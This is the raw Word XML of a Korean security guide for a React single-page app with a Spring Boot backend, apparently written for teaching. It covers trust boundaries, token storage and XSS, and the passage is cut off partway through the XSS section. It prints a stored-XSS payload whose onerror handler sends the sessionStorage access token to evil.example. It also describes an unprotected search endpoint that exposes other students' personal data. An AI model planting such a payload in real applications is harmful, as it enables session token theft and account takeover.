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9AC" w:rsidRPr="00595F5C" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>00. 프론트엔드 보안 가이드 — React SPA 작성 시 고려사항</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t>1. 왜 프론트엔드에도 보안 문서가 필요한가</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">백엔드 실습 문서는 "서버가 어떻게 막는가"를, 이 문서는 브라우저에서 실행되는 코드를 다룬다. 전제는 하나다 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>브라우저에 도착한 모든 것은 이미 사용자(공격자)의 손 안에 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6"/>
        <w:gridCol w:w="3430"/>
      </w:tblGrid>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="55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공격자가 브라우저에서 할 수 있는 일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그래서</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="55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F12로 자바스크립트 소스를 전부 읽는다(난독화해도 실행 가능한 형태라 숨길 수 없다)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소스에 비밀을 둘 수 없다</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="55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요청을 가로채 바꾸거나 다시 보낸다(Burp Suite, 개발자 도구)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화면의 검사는 건너뛸 수 있다</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="55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sessionStorage · localStorage · 쿠키 값을 읽고 바꾼다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브라우저에 저장한 값을 믿을 수 없다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spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">따라서 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>실제 차단은 서버</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">가 하고, 프론트엔드의 보안 책임은 "권한 판단"이 아니라 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>사용자와 토큰을 지키는 것</w:t>
      </w:r>
      <w:r>
        <w:t>이다 — 토큰을 흘리지 않고(XSS·로그·URL), 사용자를 엉뚱한 곳으로 보내지 않고(오픈 리다이렉트), 공격자가 만든 경로로 요청을 대신 보내지 않는 것(경로 조작).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t>2. 전체 구조 한눈에 보기 — 프론트엔드와 백엔드의 연동</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t>그림 1은 구성 요소와 신뢰 경계, 그림 2는 인증·토큰 흐름, 그림 3은 요청 하나가 거치는 검사 지점이다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2-1. 연동 구조와 신뢰 경계</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CC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4133850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="그림 1. 프론트엔드(신뢰할 수 없는 영역)와 백엔드(신뢰 영역)의 구성과 경계" descr="그림 1. 프론트엔드(신뢰할 수 없는 영역)와 백엔드(신뢰 영역)의 구성과 경계" title="그림 1. 프론트엔드(신뢰할 수 없는 영역)와 백엔드(신뢰 영역)의 구성과 경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AC" w:rsidRDefault="00CA1CC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그림 1. 프론트엔드(신뢰할 수 없는 영역)와 백엔드(신뢰 영역)의 구성과 경계</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">요청은 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>화면 → store → API 모듈 → client.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 순서로 내려가고 토큰은 client.js만 붙인다. 서버는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CORS → 인증 → 인가 → 입력 검증 → 업무 규칙</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 순서로 매 요청을 다시 검사한다.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978"/>
        <w:gridCol w:w="3611"/>
      </w:tblGrid>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:tblHeader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계층 (파일)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하는 일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보안 책임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화면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pages/*, components/*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입력 받기, 결과 그리기, 역할별 버튼 표시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 w:rsidP="00C4572E">
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">JSX 자동 escape 유지, 서버 메시지 그대로 표시. </w:t>
            </w:r>
            <w:r w:rsidR="00C4572E" w:rsidRPr="00C4572E">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>버튼을 숨겨도 API는 열려 있다 → 실제 차단은 서버가</w:t>
            </w:r>
            <w:r w:rsidR="00C4572E">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C4572E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>한다.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라우팅 가드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App.jsx, RequireAuth, AdminOnly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미로그인 → /login, 관리자 메뉴 표시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편의 장치. 실제 차단은 서버 401/403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상태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store/*.js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token, user, roles, 목록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 w:rsidP="005B443A">
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>roles는 표시용. 값이 없으면 "권한 없음</w:t>
            </w:r>
            <w:r w:rsidR="005B443A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(fail-closed</w:t>
            </w:r>
            <w:r w:rsidR="005B443A">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidR="005B443A" w:rsidRPr="005B443A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>권한 없는 사용자로 처리함</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidR="003771C3">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>"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API 모듈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authApi.js, studentApi.js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엔드포인트별 함수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 w:rsidP="003A7F71">
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>경로</w:t>
            </w:r>
            <w:r w:rsidR="003A7F71">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 안에 들어가는 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>값</w:t>
            </w:r>
            <w:r w:rsidR="003A7F71">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/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 w:rsidR="003A7F71">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>e</w:t>
            </w:r>
            <w:r w:rsidR="003A7F71">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>ncodeURIComponent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="003A7F71">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="003A7F71">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>값)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">·검증, </w:t>
            </w:r>
            <w:r w:rsidR="003A7F71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 xml:space="preserve">쿼리는 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="003A7F71">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>axios</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="003A7F71">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">의 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>params</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="003A7F71">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="003A7F71">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>옵션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통신 통로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api/client.js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 부착, 401 갱신·재시도, 오류 정리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토큰을 붙이는 유일한 곳. 갱신 실패 시 즉시 폐기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 보관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lib/token.js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sessionStorage 읽기/쓰기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저장 위치를 한 곳에서 관리. 토큰 로그 금지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서버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Spring Boot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인증·인가·검증·업무 규칙</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="36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모든 보안 판단의 최종 책임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2-2. 인증 · 토큰 흐름</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CC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5638800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="그림 2. 로그인 → API 호출 → accessToken 만료 시 갱신 → 갱신 실패/로그아웃" descr="그림 2. 로그인 → API 호출 → accessToken 만료 시 갱신 → 갱신 실패/로그아웃" title="그림 2. 로그인 → API 호출 → accessToken 만료 시 갱신 → 갱신 실패/로그아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AC" w:rsidRDefault="00CA1CC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그림 2. 로그인 → API 호출 → accessToken 만료 시 갱신 → 갱신 실패/로그아웃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4"/>
        <w:gridCol w:w="7582"/>
      </w:tblGrid>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:tblHeader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포인트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roles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화면 구성용. 권한은 서버가 매 요청 토큰으로 다시 판정한다. 새로고침 뒤에는 GET /api/userinfos/me로 복원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 수명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accessToken 15분 / refreshToken 14일. refreshToken은 쓸 때마다 새로 발급(회전)되고, 이미 쓴 것을 다시 보내면 그 사용자의 refreshToken이 전부 폐기된다(재사용 탐지)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동시 401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refreshingPromise로 갱신을 1회로 묶는다. 두 번 나가면 두 번째가 재사용으로 탐지돼 세션이 모두 끊긴다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재시도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1회만(_retried). 로그인·갱신 요청 자체의 401은 갱신 대상에서 뺀다(오류 메시지 보존, 무한 루프 방지)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로그아웃</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="75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브라우저 토큰을 먼저 지우고 POST /logout으로 refreshToken 폐기. accessToken은 만료(최대 15분)까지 유효하므로 짧은 수명 자체가 방어다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2-3. 요청 하나가 거치는 검사 지점</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CC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162175"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="그림 3. 브라우저 쪽 검사(1~3)는 건너뛸 수 있고, 서버 쪽 검사(4~8)만이 실제 보안 통제다" descr="그림 3. 브라우저 쪽 검사(1~3)는 건너뛸 수 있고, 서버 쪽 검사(4~8)만이 실제 보안 통제다" title="그림 3. 브라우저 쪽 검사(1~3)는 건너뛸 수 있고, 서버 쪽 검사(4~8)만이 실제 보안 통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AC" w:rsidRDefault="00CA1CC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그림 3. 브라우저 쪽 검사(1~3)는 건너뛸 수 있고, 서버 쪽 검사(4~8)만이 실제 보안 통제다</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="2" w:space="4" w:color="E8D174"/>
          <w:left w:val="single" w:sz="2" w:space="4" w:color="E8D174"/>
          <w:bottom w:val="single" w:sz="2" w:space="4" w:color="E8D174"/>
          <w:right w:val="single" w:sz="2" w:space="4" w:color="E8D174"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF4CE"/>
        <w:spacing w:before="80" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1~3은 정상 사용자를 위한 "친절", 4~8은 모든 요청에 대한 "강제"다. 새 기능의 검사가 1~3에만 있다면 보안 검사가 없는 것과 같으므로, 4~8 중 어디에 있는지 백엔드에 확인한다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t>3. 핵심 원칙 — 신뢰 경계(Trust Boundary)는 서버다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75A50">
        <w:trPr>
          <w:tblHeader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할 수 있는 일 (프론트엔드)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할 수 없는 일 (프론트엔드)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:cantSplit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역할에 맞는 화면/메뉴를 보여주거나 숨긴다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권한 검사를 "대신"한다</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:cantSplit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입력값을 미리 걸러 사용자 경험을 개선한다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입력값 검증을 서버 대신 "최종" 판단한다</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:cantSplit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서버가 돌려준 403/404를 그대로 보여준다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서버 응답 없이 접근 가능 여부를 스스로 판정한다</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr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토큰을 안전하게 보관하고 필요한 요청에만 붙인다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토큰을 "숨겨서" 안전하게 만든다(브라우저에는 숨길 곳이 없다)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00EC19A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6589"/>
      </w:tblGrid>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:tblHeader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이 프로젝트의 적용 예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원칙을 따른 방식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App.jsx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 w:rsidP="00DB3C6E">
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>학생 수정 라우트(/students/:id/edit)를 AdminOnly로 막지 않는다. "본인 것인가"는 서버만 알</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>고 있으므</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>로, 들어오게 두고 서버의 403 메시지를 보여 준다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StudentFormPage.jsx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조회·저장이 403이면 서버 메시지를 보여 주고 목록으로 돌려보낸다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StudentListPage.jsx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MyStudentLookup.jsx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isAdmin으로 화면만 나눈다. 데이터 권한은 매 요청 서버가 판정(남의 학번 조회 시 403)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Bdr>
          <w:top w:val="single" w:sz="2" w:space="4" w:color="E8D174"/>
          <w:left w:val="single" w:sz="2" w:space="4" w:color="E8D174"/>
          <w:bottom w:val="single" w:sz="2" w:space="4" w:color="E8D174"/>
          <w:right w:val="single" w:sz="2" w:space="4" w:color="E8D174"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF4CE"/>
        <w:spacing w:before="80" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>역할 기반 UI 분기(isAdmin ? A : B)는 편의 장치이지 보안 장치가 아니다. 조건을 조작해 화면을 띄워도 서버가 403을 주면 데이터는 보이지 않는다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="2" w:space="4" w:color="E6A19A"/>
          <w:left w:val="single" w:sz="2" w:space="4" w:color="E6A19A"/>
          <w:bottom w:val="single" w:sz="2" w:space="4" w:color="E6A19A"/>
          <w:right w:val="single" w:sz="2" w:space="4" w:color="E6A19A"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FDECEA"/>
        <w:spacing w:before="80" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>⚠ 반대 사례 — /api/search/**는 서버가 소유권을 검사하지 않는다(API_SPEC 3장). 앱은 검색 UI를 관리자에게만 보여 주지만, ROLE_USER도 자기 토큰으로 직접 호출하면 다른 학생의 주소·전화번호·이메일을 받는다. UI 숨김은 해결책이 아니며, 백엔드에서 ROLE_ADMIN 제한이나 소유권 조건을 추가해야 한다(A01, A06).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t>4. 프론트엔드 작성 시 반드시 알아야 할 보안 고려사항</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t>절 제목의 [A0x]는 OWASP Top 10:2025 항목 번호다(예: [A01] = A01:2025 접근 제어 실패). 번호 읽는 법은 5-1, 항목별 원칙은 5-2에 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>4-1. 토큰을 어디에, 얼마나 오래 보관하는가 [A04 · A07]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083"/>
        <w:gridCol w:w="1173"/>
        <w:gridCol w:w="2798"/>
        <w:gridCol w:w="1987"/>
      </w:tblGrid>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:tblHeader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저장 위치</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10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새로고침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탭 닫기</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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XSS 노출 시</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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CSRF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메모리(변수/상태)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10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사라짐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사라짐</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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실행 중에만 노출(가장 짧음)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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안전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sessionStorage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10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사라짐</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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탭이 열린 동안 노출</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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안전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localStorage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10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27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영구 노출(탭을 닫아도 유효)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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안전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HttpOnly + Secure 쿠키</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10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설정에 따름</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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JS로 읽을 수 없음</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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SameSite·CSRF 토큰 필요</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00EC19A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275A50">
        <w:trPr>
          <w:tblHeader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75A50">
        <w:trPr>
          <w:cantSplit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이 앱의 방식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 xml:space="preserve">accessToken·refreshToken 모두 sessionStorage(lib/token.js). localStorage보다 노출 기간이 짧지만, XSS가 나면 둘 다 읽혀 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>15분이 아니라 최대 14일짜리 열쇠</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>가 털린다</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:cantSplit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재사용 탐지의 한계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공격자가 먼저 갱신하면 정상 사용자의 다음 갱신이 재사용으로 탐지되어 양쪽 모두 로그아웃된다. 피해 시간을 줄일 뿐 탈취를 막지는 못한다</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:cantSplit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운영 권장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 xml:space="preserve">refreshToken은 서버가 Set-Cookie: HttpOnly; Secure; SameSite=Strict로 내려 JS가 못 읽게 하고, accessToken은 메모리에만 둔다. 이 프로젝트는 교육용이라 sessionStorage를 유지하므로 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>4-2 XSS 차단이 더 중요</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>하다</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:cantSplit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토큰 전송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Authorization 헤더로만 보낸다. URL 쿼리·해시·경로에 넣으면 방문 기록·서버 로그·Referer·공유 링크로 샌다</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="180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JWT 내용</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="72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payload는 암호화가 아니라 Base64 인코딩이라 누구나 읽는다. 개인정보를 넣지 않고, 디코드한 값으로 권한·만료를 확정하지 않는다(서명 검증 불가)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4-2. XSS (Cross-Site Scripting) — 가장 먼저 막아야 할 위협 [A05]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XSS = 공격자가 입력한 글자가 다른 사람의 브라우저에서 코드로 실행되는 것.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 실행된 코드는 화면을 보는 사람의 권한으로 동작해 토큰을 훔치거나 그 사람인 척 API를 호출한다. 이 앱에서는 이런 흐름이 가능하다.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8124"/>
      </w:tblGrid>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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8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일어나는 일</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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8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ROLE_USER가 학생 주소 칸에 HTML 태그(아래 코드)를 넣어 등록한다</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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8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서버는 200자 이내 문자열이라 검증을 통과시키고 그대로 저장한다</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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③</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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관리자가 목록을 열 때 화면이 주소를 HTML로 그리면, 그림 x를 불러오다 실패하고 onerror 코드가 실행된다</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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④</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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관리자의 accessToken이 공격자 서버로 전송된다 → 공격자가 관리자가 된다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Bdr>
          <w:top w:val="single" w:sz="2" w:space="4" w:color="E6A19A"/>
          <w:left w:val="single" w:sz="2" w:space="4" w:color="E6A19A"/>
          <w:bottom w:val="single" w:sz="2" w:space="4" w:color="E6A19A"/>
          <w:right w:val="single" w:sz="2" w:space="4" w:color="E6A19A"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FDECEA"/>
        <w:spacing w:before="80" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>// [공격자가 주소 칸에 입력한 값]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&lt;img src="x" onerror="fetch('https://evil.example/?t=' + sessionStorage.getItem('accessToken'))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>React의 기본 방어 — 중괄호 { }</w:t>
      </w:r>
      <w:r>
        <w:t>: React는 {값}을 항상 글자로만 출력한다(escape). 그래서 지금의 StudentTable.jsx(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
